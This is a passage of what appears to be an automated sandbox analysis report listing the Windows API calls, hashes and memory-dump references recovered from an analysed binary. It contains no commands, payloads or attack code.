                                                                                                                        • Instruction Fuzzy Hash: 4521D4B2608211BEEB159B699C49FBB7FA8EF45750F14802DF80ADB091EE71DD4096B0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00DFDCC0
                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00DFDCE4
                                                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00DFDCFC
                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00DFDD24
                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00DE407D,00000000), ref: 00DFDD42
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2294984445-0
                                                                                                                        • Opcode ID: 15ff208f0ef4461627ac3ac31f909f424406c3d0c86a2d51d8e7b13419b27267
                                                                                                                        • Instruction ID: f69308b374337c155eedcf2e6ccc39f7ba952fa23de9e9b80def21c1973e734c
                                                                                                                        • Opcode Fuzzy Hash: 15ff208f0ef4461627ac3ac31f909f424406c3d0c86a2d51d8e7b13419b27267
                                                                                                                        • Instruction Fuzzy Hash: A421F131604319AFCB245F398C48BB937A7FB46325B1A8B24FA36D61E0D370D854CBA0
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DCCA86
                                                                                                                          • Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9
                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00DCCAB8
                                                                                                                        • __itow.LIBCMT ref: 00DCCAD0
                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00DCCAF6
                                                                                                                        • __itow.LIBCMT ref: 00DCCB07
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$__itow$_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2983881199-0
                                                                                                                        • Opcode ID: 44c86f73d23881482fe6c1b31732d7c83a6b3e33a0a1eebd6ccd3da723fb29d8
                                                                                                                        • Instruction ID: 195f2e2f3f67e20fb16a87d795aaf39569538beea6c111124437d41044230129
                                                                                                                        • Opcode Fuzzy Hash: 44c86f73d23881482fe6c1b31732d7c83a6b3e33a0a1eebd6ccd3da723fb29d8
                                                                                                                        • Instruction Fuzzy Hash: 3F21D472A102057BDF21AAA59C4AFDE7A69EF59750F046028FA09E7181DA60CD0587B0
                                                                                                                        APIs
                                                                                                                        • IsWindow.USER32(00000000), ref: 00DE89CE
                                                                                                                        • GetForegroundWindow.USER32 ref: 00DE89E5
                                                                                                                        • GetDC.USER32(00000000), ref: 00DE8A21
                                                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00DE8A2D
                                                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00DE8A68
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4156661090-0
                                                                                                                        • Opcode ID: 90e0f0d397f20ca7c1414401e854c28b2dc7b3577f348f5f689bfb5f3c0c4c5b
                                                                                                                        • Instruction ID: f6190f7c610db35cf4f2f1df8efa1e9a3915e2f2f80d7952e8c03d9dd4c1a1c3
                                                                                                                        • Opcode Fuzzy Hash: 90e0f0d397f20ca7c1414401e854c28b2dc7b3577f348f5f689bfb5f3c0c4c5b
                                                                                                                        • Instruction Fuzzy Hash: E7218175A00204AFDB00EFA6CC85AAA7BF5EF48311B05C479E94A97352CB70AD04CB70
                                                                                                                        APIs
                                                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00DAB5EB
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00DAB5FA
                                                                                                                        • BeginPath.GDI32(?), ref: 00DAB611
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00DAB63B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3225163088-0
                                                                                                                        • Opcode ID: d1572ed55d74d6c0d45cbb86f852dd5b15a9c7df18d42f886e096db85ab0a4b7
                                                                                                                        • Instruction ID: 8251a368e40a859e3aa72f37197fecd128e09ef87bbbc39bde63d04c8d99a6d3
                                                                                                                        • Opcode Fuzzy Hash: d1572ed55d74d6c0d45cbb86f852dd5b15a9c7df18d42f886e096db85ab0a4b7
                                                                                                                        • Instruction Fuzzy Hash: 2F21A170900309EFDB289F16ED487A97BE9FB0232AF184557F550BA1E1D370989ACF60
                                                                                                                        APIs
                                                                                                                        • __calloc_crt.LIBCMT ref: 00DB2E81
                                                                                                                        • CreateThread.KERNEL32(?,?,00DB2FB7,00000000,?,?), ref: 00DB2EC5
                                                                                                                        • GetLastError.KERNEL32 ref: 00DB2ECF
                                                                                                                        • _free.LIBCMT ref: 00DB2ED8
                                                                                                                        • __dosmaperr.LIBCMT ref: 00DB2EE3
                                                                                                                          • Part of subcall function 00DB889E: __getptd_noexit.LIBCMT ref: 00DB889E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2664167353-0
                                                                                                                        • Opcode ID: 7ae65eef401da53334791530db1327c233ece4bcd78a001dbe216aa96a1a0371
                                                                                                                        • Instruction ID: 53fed72bdc8b37f375548fe0691be02c5d4097450c404b2cd1dd156a64776e3f
                                                                                                                        • Opcode Fuzzy Hash: 7ae65eef401da53334791530db1327c233ece4bcd78a001dbe216aa96a1a0371
                                                                                                                        • Instruction Fuzzy Hash: B3118B37104706EFDB21AFA6AC42DFB7BA8EF45770B140529FA1A96191EB31C80096B0
                                                                                                                        APIs
                                                                                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00DCB903
                                                                                                                        • GetLastError.KERNEL32(?,00DCB3CB,?,?,?), ref: 00DCB90D
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00DCB3CB,?,?,?), ref: 00DCB91C
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00DCB3CB), ref: 00DCB923
                                                                                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00DCB93A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 883493501-0
                                                                                                                        • Opcode ID: c12553d0c95e734117e1bdea4544393c31b72495d2d4253309f735f03a960076
                                                                                                                        • Instruction ID: 134d477651ce1ea42693692e6ff62fe1d3070efff888e22a7ede123ade7d0c8e
                                                                                                                        • Opcode Fuzzy Hash: c12553d0c95e734117e1bdea4544393c31b72495d2d4253309f735f03a960076
                                                                                                                        • Instruction Fuzzy Hash: 8F016971201209BFDB114FA6DC89EAB3BADEF8A764B14402AF945D3260DB75CC44DE70
                                                                                                                        APIs
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00DD8371
                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00DD837F
                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00DD8387
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00DD8391
                                                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00DD83CD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2833360925-0
                                                                                                                        • Opcode ID: 8b406a01ab09e62c82e83fe28e623d91637528a3e242235d1bb1b449286aea48
                                                                                                                        • Instruction ID: 69e1a548dd2042a816e115550c33b092e17111ca0623dae2888e67a1585cadf2
                                                                                                                        • Opcode Fuzzy Hash: 8b406a01ab09e62c82e83fe28e623d91637528a3e242235d1bb1b449286aea48
                                                                                                                        • Instruction Fuzzy Hash: C4016931D05619EFCF00AFAAEC48AEEBB78FB08B11F000046E545F2250CF709554D7A1
                                                                                                                        APIs
                                                                                                                        • CLSIDFromProgID.COMBASE ref: 00DCA874
                                                                                                                        • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00DCA88F
                                                                                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 00DCA89D
                                                                                                                        • CoTaskMemFree.COMBASE(00000000), ref: 00DCA8AD
                                                                                                                        • CLSIDFromString.COMBASE(?,?), ref: 00DCA8B9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3897988419-0
                                                                                                                        • Opcode ID: ef169f24cdef89a344a2ea404dc302d1d451ca2e2af1def602fb85e4000f836d
                                                                                                                        • Instruction ID: 7943ba5bea14ed13ec2dbe16e199504fe1a92bc962fa02f7220ca3b4cad74798
                                                                                                                        • Opcode Fuzzy Hash: ef169f24cdef89a344a2ea404dc302d1d451ca2e2af1def602fb85e4000f836d
                                                                                                                        • Instruction Fuzzy Hash: 1F018B7660021AAFDB144F69DC84BAABBADEF44399F158029B901E3210D770DD459BB1
                                                                                                                        APIs
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00DCB806
                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00DCB810
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DCB81F
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00DCB826
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DCB83C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 47921759-0
                                                                                                                        • Opcode ID: d87506896310df2ac47dee82c5ed73880e30f26751fd8644a4763f61b031af93
                                                                                                                        • Instruction ID: 7de1d6fd245a1fd17396fae301ad365d8ffcc7a5050c2df8a9cf160efbde4e46
                                                                                                                        • Opcode Fuzzy Hash: d87506896310df2ac47dee82c5ed73880e30f26751fd8644a4763f61b031af93
                                                                                                                        • Instruction Fuzzy Hash: 69F0A975201205BFEB210FA6EC99FAB3B6DFF4A764F04802AF941D7150CBA0D805CA70
                                                                                                                        APIs
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DCB7A5
                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DCB7AF
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DCB7BE
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00DCB7C5
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DCB7DB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 47921759-0
                                                                                                                        • Opcode ID: c20b9198e501a1a0023d0f670868757c803b693df1f7d817b3391e6e33aa1aec
                                                                                                                        • Instruction ID: 5f79af5892380b12960e65bded06e74565722dbabe26281855ef9050ebf258bc
                                                                                                                        • Opcode Fuzzy Hash: c20b9198e501a1a0023d0f670868757c803b693df1f7d817b3391e6e33aa1aec
                                                                                                                        • Instruction Fuzzy Hash: 18F0AF752413557FEB100FA6AC89FAB3BADFF8A765F04801AF940D7190CB60DC058A70
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00DCFA8F
                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00DCFAA6
                                                                                                                        • MessageBeep.USER32(00000000), ref: 00DCFABE
                                                                                                                        • KillTimer.USER32(?,0000040A), ref: 00DCFADA
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00DCFAF4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3741023627-0
                                                                                                                        • Opcode ID: b66932e6cbb9391dcf0a54d6eab3fe8c3ddc72d70a413228086b58be84b1fff2
                                                                                                                        • Instruction ID: 5a39d0412adc8147f4d2ccd91111dd8ca2ad43561a313ecac62066f04cce995e
                                                                                                                        • Opcode Fuzzy Hash: b66932e6cbb9391dcf0a54d6eab3fe8c3ddc72d70a413228086b58be84b1fff2
                                                                                                                        • Instruction Fuzzy Hash: 8B018130504706AFEF259F15DD4EFD6B7BABB00B09F04416DB187B60E0DBF4A9488A60
                                                                                                                        APIs
                                                                                                                        • EndPath.GDI32(?), ref: 00DAB526
                                                                                                                        • StrokeAndFillPath.GDI32(?,?,00E0F583,00000000,?), ref: 00DAB542
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00DAB555
                                                                                                                        • DeleteObject.GDI32 ref: 00DAB568
                                                                                                                        • StrokePath.GDI32(?), ref: 00DAB583
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2625713937-0
                                                                                                                        • Opcode ID: 41d99298e3023d97e4b7fcd39fd3bac70935c88e7f1f12a0260e29c46ec89a14
                                                                                                                        • Instruction ID: 00741632243c3900f697cb0447b8ae938cda018050108a819706e84ab9dd214a
                                                                                                                        • Opcode Fuzzy Hash: 41d99298e3023d97e4b7fcd39fd3bac70935c88e7f1f12a0260e29c46ec89a14
                                                                                                                        • Instruction Fuzzy Hash: 18F0C930504704AFDB2D5F66ED087943FE5A702336F188655E5A9681F1C734899ADF10
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00DDFAB2
                                                                                                                        • CoCreateInstance.COMBASE(00E1DA7C,00000000,00000001,00E1D8EC,?), ref: 00DDFACA
                                                                                                                          • Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F
                                                                                                                        • CoUninitialize.COMBASE ref: 00DDFD2D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                        • String ID: .lnk
                                                                                                                        • API String ID: 2683427295-24824748
                                                                                                                        • Opcode ID: 5014d9703618309798c4595bf12fafa133b3bfc533f8fa828ce004dd7fc20d86
